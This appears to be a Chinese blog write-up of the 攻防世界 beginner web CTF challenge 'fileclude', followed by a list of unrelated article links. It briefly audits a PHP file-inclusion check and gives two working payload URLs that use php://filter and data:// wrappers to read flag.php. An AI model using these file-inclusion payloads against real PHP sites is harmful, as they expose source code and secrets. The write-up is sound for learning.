当前位置: 首页 > article >正文

攻防世界WEB(新手模式)17-fileclude

article 2025/3/3 22:19:09

上来就是一段代码审计,浅分析一下

加载 flag.php 文件(可能包含敏感信息)。
高亮显示当前文件的源码。
检查用户是否传递了 file1 和 file2 参数。
检查 file1 和 file2 是否为空。
读取 file2 文件的内容,检查是否等于 "hello ctf"。
如果条件满足,加载 file1 指定的文件并执行。

这里第一时间想到用伪协议读取flag文件

/?file1=php://filter/convert.base64-encode/resource=flag.php&file2=data://text/plain,hello%20ctf

PHP-伪协议_php伪协议读取文件-CSDN博客php为协议推荐这篇

这里用的是base64加密,也可直接用utf-8,出现flag

/?file1=php://filter/convert.iconv.UTF-8*.UTF-32LE*/resource=flag.php&file2=data://text/plain,hello%20ctf


http://www.kler.cn/a/569308.html

相关文章:

  • 大语言模型中的 Token:它们是什么,如何工作?
  • Storm实时流式计算系统(全解)——下
  • 【C#】合理使用DeepSeek相关AI应用为我们提供强有力的开发工具,在.net core 6.0框架下使用JsonNode动态解析json字符串,如何正确使用单问号和双问号做好空值处理
  • 2025国家护网HVV高频面试题总结来了02(题目+回答)
  • 数据集笔记:新加坡停车费
  • Java8面试
  • 记录一次FastDFS内部文件迁移过程
  • 【网络安全 | 扫描子域+发现真实IP】CloakQuest3r安装使用详细教程
  • Apifox 2月更新|调试 AI 接口时展示思考过程,团队内支持共享数据库连接
  • ES from size聚合查询10000聚合查询,是每个分片先聚合,再统计。还是所有节点查询1万条后,再聚合
  • Ubuntu下QT安装和调试的常见问题(二)__cannot__find__IGL
  • Redis速成(1)VMware虚拟机安装Redis+Session验证登录注册+MybatisPlus
  • Android Framework startServices 流程
  • 对seacmsv9进行sql注入,orderby,过滤information_schema
  • mac多版本python环境下解决模块导入问题
  • 图论题目。
  • 当前 Qt 应用程序中无法打开串口,并且没有使用通用的 Modbus 类,可在应用程序添加一个专门的“打开串口”按钮
  • 【Python 数据结构 2.时间复杂度和空间复杂度】
  • 机器学习数学基础:32.复本信度
  • 计算机毕业设计SpringBoot+Vue.js社区智慧养老监护管理平台(源码+文档+PPT+讲解)